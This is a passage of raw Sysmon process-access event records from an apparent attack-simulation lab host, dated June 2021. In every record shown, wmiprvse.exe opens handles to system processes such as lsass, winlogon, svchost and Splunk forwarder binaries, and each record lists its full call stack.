21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0E00-00000000D101}880C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150597Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0D00-00000000D101}788C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150596Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0D00-00000000D101}788C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150595Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150594Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150593Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150592Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150591Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0900-00000000D101}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150590Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0900-00000000D101}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150589Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-481E-60CA-2D08-00000000D101}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150588Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-481E-60CA-2D08-00000000D101}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150587Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150586Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150585Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480E-60CA-FA07-00000000D101}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150584Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480E-60CA-FA07-00000000D101}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150583Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150582Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 